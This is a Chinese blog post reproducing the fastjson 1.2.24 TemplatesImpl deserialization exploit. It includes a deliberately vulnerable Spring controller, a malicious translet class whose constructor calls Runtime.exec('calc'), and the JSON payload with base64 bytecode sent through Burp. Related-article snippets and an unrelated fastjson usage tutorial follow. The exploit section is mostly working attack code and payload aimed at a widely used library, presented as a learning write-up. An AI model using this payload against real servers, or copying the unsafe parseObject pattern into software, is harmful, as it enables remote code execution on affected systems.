fastjson利用templatesImpl链

最新推荐文章于 2025-04-16 21:52:59 发布
最新推荐文章于 2025-04-16 21:52:59 发布
阅读量378 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: JAVA 文章标签: web安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bring_coco/article/details/132551077

fastjson1.2.24
环境:
pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.6.11</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>Fastjson-test</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>Fastjson-test</name>
    <description>Fastjson-test</description>

    <properties>
        <java.version>1.8</java.version>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.8.1</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                    <encoding>UTF-8</encoding>
                </configuration>
            </plugin>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

FastjsonController.java:

package com.example.fastjsontest;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class FastjsonController {
    @PostMapping( "/deserialize")
    @ResponseBody
    public String deserialize(@RequestParam String code) throws Exception{
//        JSON.parse(code);
        //fastjson1.2.47 TemplatesImpl利用
        JSON.parseObject(code,Object.class, Feature.SupportNonPublicField);
        return "deserialize";
    }
}

恶意类代码:
TemplatesImplEvil.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class TemplatesImplEvil extends AbstractTranslet {
    public TemplatesImplEvil() throws IOException {
        super();
        Runtime.getRuntime().exec("calc");
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

build成TemplatesImplEvil.class
然后base64编码该类
在这里插入图片描述
然后burp输入

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAA......."],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}

在这里插入图片描述
可以看的到成功弹出计算器

fastjson 1.22-1.24 TemplatesImpl反序列化漏洞分析
Vicl1fe的博客
07-09 820
前言 看了别人的文章,我也打算先分析TemplatesImpl利用,关于fastjson的使用可以参考:fastjson 使用 环境 jdk 1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version> </dependency&
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用分析(非常详细)
dreamthe的博客
07-07 2536
本文的关于Fastjson1.2.24版本TemplatesImpl利用的分析非常详细,如果你不是很熟悉该利用,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
代码审计之Fastjson利用
久恙502的博客
12-16 1381
代码审计的学习记录,审计复现,大佬们多多指正!!!
Web开发-JavaEE应用&原生和FastJson反序列化&URLDNS&JDBC&Gadget手搓
最新发布
SuperherRo的博客
04-16 414
知识点: 1、安全开发-JavaEE-原生序列化-URLDNS分析 2、安全开发-JavaEE-FastJson-JdbcRowSetImpl分析
Java代码审计——Fastjson TemplatesImpl调用
王嘟嘟的博客
12-09 2782
0x00 前言 反序列化总纲 除开jdbc调用,还有一个TemplatesImpl的调用,这个在CC中是出现过的。可以参考:调用 主要的要点在满以下三个变量 _bytecodes _name _tfactory 还有就是调用newTransformer的方法 0x01 调用 先上poc: final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ParserConfig conf
fastjson反序列化TemplatesImpl
qq_40710190的博客
07-07 896
FastJson的TemplateImpl利用
Fastjson 的 3 种漏洞利用,一起来看看
Java技术栈,分享最主流的Java技术
11-05 1867
作者:4ra1n 来源:https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用做分析和对比 JdbcRowSetImpl String payload = "{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n&quot
fastjson TemplatesImpl
lylong0703的博客
03-10 628
1. fastjson 简单使用 类 package gfftufukv; public class User { String name; private String grage = ""; public User() { System.out.println("constrctor1"); } public User(String name) { System.out.println("constrctor2");
fastjson1.2.24TemplatesImpl利用源码分析
weixin_45682070的博客
12-28 872
构造恶意类 package org.example.fastjson.TemplatesImpl; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import com.alibaba.fastjson.parser.ParserConfig; public class Test { public static void main(String[] args) { Parse
Fastjson反序列化漏洞TemplateImpl利用条跟踪与分析
Armandhe的博客
11-04 678
Fastjson反序列化漏洞TemplateImpl利用条跟踪与分析
Fastjson JdbcRowSetImpl利用学习
虚幻私塾
04-15 1533
Python微信订餐小程序课程视频 https://blog.youkuaiyun.com/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.youkuaiyun.com/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 2645
Fastjson组件反序列化分析,从基础到RCE的过程笔记
13-java安全——fastjson1.2.24反序列化TemplatesImpl利用分析
网络安全
08-27 3432
漏洞环境: fastjson1.2.24 jdk1.7.80 新建一个maven项目在pom.xml文件中引入fastjson的依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</v
FastJson反序列化漏洞利用的三个细节 - TemplatesImpl利用
weixin_33853794的博客
08-31 722
0. 前言 记录在FastJson反序列化RCE漏洞分析和利用时的一些细节问题。 1. TemplatesImpl利用 关于 parse 和 parseObject FastJson中的 parse() 和 parseObject()方法都可以用来将JSON字符串反序列化成Java对象,parseObject() 本质上也是调用 parse() 进行反序列化的。但是 parseObje...
一起来看看Fastjson的三种漏洞利用
程序猿DD
08-24 2349
作者 |4ra1n来源 |https://www.anquanke.com/post/id/248892Fastjson已被大家分析过很多次,本文主要是对三种利用做分析和对比Jdbc...
Java安全fastjson分析
Karka_的博客
09-15 387
前段时间有师傅来问了我fastjson的问题,虽然知道大概但没分析过具体,最近有空了正好分析一下fastjson两个反序列化洞:Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java Object之间互相转换,提供两个主要接口JSON.toJSONString和JSON.parseObject/JSON.parse来分别实现序列化和反序列化操作。本文涉及相关实验:[Fastjson反序列化漏洞](https://www.hetianlab.com/expc
Web】速谈FastJson反序列化中TemplatesImpl利用
uuzeray的博客
03-03 966
③_outputProperties:json数据在反序列化时会调用TemplatesImpl类的getOutputProperties方法触发利用,可以理解为outputProperties属性的作用就是为了调用getOutputProperties方法。而getOutputProperties()正是TemplatesImpl的_outputProperties属性对应的getter方法。所以我们只要利用FJ反序列化会调用类的getter方法的特性来打TemplatesImpl即可。
java安全fastjson分析
蚁景网安学院
06-03 648
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
JAVA安全FastJson反序列化&利用跟踪&autoType绕过
2301_76227305的博客
02-07 1685
目前主流公开的利用都进行了分析,后续如果有其它的条,再慢慢分析吧。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
fastjson利用
01-18
### FastJson 的使用方法与最佳实践 #### 解析 JSON 数据 FastJson 支持多种方式解析 JSON 字符串到 Java 对象。对于简单的 JSON 字符串,可以直接调用 `parseObject` 方法: ```java String jsonString = "{\"code\":0,\"msg\":\"查询用户信息\",\"user\":{\"id\":12,\"name\":\"Herrona\"},\"list\":[{\"id\":1,\"name\":\"yg\"},{\"id\":2,\"name\":\"yf\"}]}"; JSONObject jsonObject = JSONObject.parseObject(jsonString); int code = jsonObject.getIntValue("code"); String msg = jsonObject.getString("msg"); User user = jsonObject.getObject("user", User.class); // 需要提前定义好对应的类结构 List<User> list = jsonObject.getJSONArray("list").toJavaList(User.class); System.out.println(code + ", " + msg + ", " + user.getName() + ", " + list.get(0).getName()); ``` 上述代码展示了如何将复杂的嵌套 JSON 转换成相应的 Java 类型[^3]。 #### 生成 JSON 数据 当需要把 Java 对象转换成 JSON 格式时,可以利用 `.toJSONString()` 或者 `JSON.toJSONBytes()` 来完成这一操作: ```java public class Main { public static void main(String[] args) { Map<String, Object> map = new HashMap<>(); List<Map<String, String>> userList = Arrays.asList( Collections.singletonMap("name", "yg"), Collections.singletonMap("name", "yf") ); map.put("code", 0); map.put("msg", "查询用户信息"); map.put("user", Collections.singletonMap("name", "Herrona")); map.put("list", userList); System.out.println(JSON.toJSONString(map)); } } ``` 这段程序会输出如下格式化的 JSON 文本: ```json { "code": 0, "msg": "查询用户信息", "user": {"name": "Herrona"}, "list": [ {"name": "yg"}, {"name": "yf"} ] } ``` 此过程不仅限于简单类型,也适用于复杂对象及其集合形式的序列化[^1]。 #### 自定义序列化行为 为了满足特定需求下的序列化定制,比如调整日期时间格式或是处理特殊字段映射等问题,可以通过设置全局配置项或是在实体类上添加注解的方式来进行控制: ```java // 设置默认日期模式为 yyyy-MM-dd HH:mm:ss Config.configInstance().setDateFormat("yyyy-MM-dd HH:mm:ss"); // 定义带注解的 POJO 类 class Event { @JSONField(format="yyyyMMdd") private Date date; // getter and setter... } Event event = new Event(); event.setDate(new Date()); // 输出自定义格式的时间戳 System.out.println(JSONObject.toJSONString(event)); ``` 这里通过 `@JSONField` 注解指定了属性 `date` 在转为 JSON 时采用指定格式表示[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值